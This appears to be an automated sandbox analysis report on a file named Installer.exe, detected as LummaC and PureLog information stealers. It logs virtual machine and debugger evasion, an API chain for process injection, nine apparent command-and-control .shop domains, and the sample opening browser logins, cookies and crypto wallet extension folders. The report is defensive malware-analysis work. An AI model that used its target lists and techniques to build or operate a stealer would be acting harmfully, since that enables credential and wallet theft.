Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Installer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Installer.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Installer.exe	Memory allocated: 1070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory allocated: 2D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory allocated: 2A70000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Installer.exe

Window / User API: threadDelayed 6964

Jump to behavior

Source: C:\Users\user\Desktop\Installer.exe TID: 7516	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe TID: 7812	Thread sleep count: 6964 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Installer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Installer.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Installer.exe	Last function: Thread delayed

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Installer.exe, 00000002.00000002.2897714001.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Installer.exe, 00000002.00000002.2897864942.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Installer.exe

API call chain: ExitProcess graph end node

graph_2-15031

Source: C:\Users\user\Desktop\Installer.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Installer.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Installer.exe

Code function: 2_2_00442EE0 LdrInitializeThunk,

2_2_00442EE0

Source: C:\Users\user\Desktop\Installer.exe	Code function: 0_2_02D68639 mov edi, dword ptr fs:[00000030h]		0_2_02D68639
Source: C:\Users\user\Desktop\Installer.exe	Code function: 0_2_02D687B6 mov edi, dword ptr fs:[00000030h]		0_2_02D687B6

Source: C:\Users\user\Desktop\Installer.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Installer.exe

Code function: 0_2_02D68639 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02D68639

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Installer.exe

Memory written: C:\Users\user\Desktop\Installer.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Installer.exe, 00000000.00000002.2071607621.0000000003D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: Installer.exe, 00000000.00000002.2071607621.0000000003D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: Installer.exe, 00000000.00000002.2071607621.0000000003D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: Installer.exe, 00000000.00000002.2071607621.0000000003D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: Installer.exe, 00000000.00000002.2071607621.0000000003D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: Installer.exe, 00000000.00000002.2071607621.0000000003D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: Installer.exe, 00000000.00000002.2071607621.0000000003D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: Installer.exe, 00000000.00000002.2071607621.0000000003D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: Installer.exe, 00000000.00000002.2071607621.0000000003D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fancywaxxers.shop

Source: C:\Users\user\Desktop\Installer.exe

Process created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Installer.exe	Queries volume information: C:\Users\user\Desktop\Installer.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Installer.exe, 00000002.00000002.2897953740.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: Installer.exe, 00000002.00000002.2898331175.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000002.00000002.2897969360.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\Installer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Installer.exe PID: 7480, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Installer.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Installer.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Installer.exe.3d69550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Installer.exe.3d69550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1653958308.00000000007A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2071607621.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
